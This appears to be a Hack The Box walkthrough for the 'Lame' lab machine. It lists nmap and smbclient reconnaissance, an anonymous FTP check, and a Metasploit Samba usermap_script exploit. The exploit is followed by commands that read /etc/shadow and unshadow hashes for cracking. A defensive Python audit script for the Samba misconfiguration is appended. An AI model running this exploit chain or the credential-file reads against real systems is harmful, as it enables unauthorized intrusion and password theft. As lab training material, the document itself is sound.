Lame
HTB - 2. Lame
- 1. Scan all ports:
      nmap -A -T4 -p- 10.10.10.3
  Takes 144 seconds. Open ports:
    21 (ftp) with version vsftpd 2.3.4 and anonymous login allowed
    22 (ssh) with version 4.7p1 Debian 8ubuntu2
    139 & 445 (samba) with version 3.0.20-Debian (workgroup: WORKGROUP)
    3632 (distccd v1) with version 4.2.4
- 2. Samba
      smbclient -L \\\\10.10.10.3\\
      exit
      smbclient -L \\\\10.10.10.3\\tmp
      exit
      smbclient -L \\\\10.10.10.3\\opt
      exit
      smbclient -L \\\\10.10.10.3\\ADMIN$
  Result: Dead end
- 3. FTP Check
      ftp 10.10.10.3
      anonymous
      anonymous
      ls
      pwd
  Result: In directory / which is empty
- 4. Search "samba 3.0.20-debian exploit": https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script and Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
- 5. Metasploit Exploit
      use exploit/multi/samba/usermap_script
      options
      set rhosts 10.10.10.3
      show targets
      exploit
      whoami
      hostname
      pwd
      ls
      updatedb
      locate root.txt
      locate user.txt
      cat /root/root.txt
      cat /home/makis/user.txt
      cat /etc/passwd
      cat /etc/shadow
      unshadow passwd shadow
  Result: Shell popped and machine owned. Can try to crack passwords with hashcat.
- 6. Search "vsftpd 2.3.4 exploit": https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor - This is a rabbit hole; don't keep trying if it doesn't work
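The usermap_script module from steps 4 and 5 depends on Samba's non-default "username map script" option, so a defender can check a host for both conditions: a version inside the range given in the exploit title and that option set in smb.conf. The following is an added example, not part of the original notes; the function names, the sample smb.conf and the script path in it are constructed for illustration.

```python
import re

# Range as written in the exploit title quoted in step 4: 3.0.20 < 3.0.25rc3
FIRST_AFFECTED = "3.0.20"
FIRST_FIXED = "3.0.25rc3"
FINAL = 10**6  # rank of a final release, so that rcN sorts before it

def version_key(text):
    """Turn '3.0.20-Debian' or '3.0.25rc3' into a sortable tuple."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(?:rc(\d+))?", text)
    if not m:
        raise ValueError(f"no Samba version in {text!r}")
    major, minor, patch, rc = m.groups()
    return (int(major), int(minor), int(patch), int(rc) if rc else FINAL)

def in_affected_range(banner):
    """True if the banner's version is >= 3.0.20 and < 3.0.25rc3."""
    return version_key(FIRST_AFFECTED) <= version_key(banner) < version_key(FIRST_FIXED)

def username_map_script(smb_conf):
    """Return the configured 'username map script' value, or None."""
    value = None
    for raw in smb_conf.splitlines():
        line = raw.strip()
        # '#' and ';' start comments; section headers carry no parameters
        if not line or line[0] in "#;" or line.startswith("[") or "=" not in line:
            continue
        name, _, val = line.partition("=")
        # smb.conf parameter names ignore case and internal whitespace
        if re.sub(r"\s+", "", name).lower() == "usernamemapscript":
            value = val.strip() or None
    return value

def audit(banner, smb_conf):
    affected = in_affected_range(banner)
    script = username_map_script(smb_conf)
    return {"affected_version": affected, "map_script": script,
            "exposed": affected and script is not None}

# Constructed sample input (not taken from the target in this write-up)
SAMPLE_CONF = """[global]
   workgroup = WORKGROUP
   ; username map = /etc/samba/smbusers
   Username Map Script = /etc/samba/scripts/mapusers.sh
[tmp]
   path = /tmp
"""

if __name__ == "__main__":
    print(audit("3.0.20-Debian", SAMPLE_CONF))
```

Removing the "username map script" line from smb.conf or upgrading past the affected range makes "exposed" come back False.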